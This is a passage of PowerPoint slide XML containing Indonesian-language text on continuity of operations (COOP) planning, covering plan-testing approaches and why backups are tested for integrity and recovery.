              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, uji </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terisolasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>latihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skala</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaminan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriteria</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>evaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengukur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, strategi COOP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berfokus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persiapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>proaktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghadapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kejadian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terduga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Cadangan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Cadangan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memainkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keberlanjutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (COOP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kehilangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memulihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> rutin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menguji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berfungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mensimulasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesenjangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menguji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memvalidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kehilangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>henti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peristiwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengganggu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menguji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengevaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecepatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisiensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memadai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
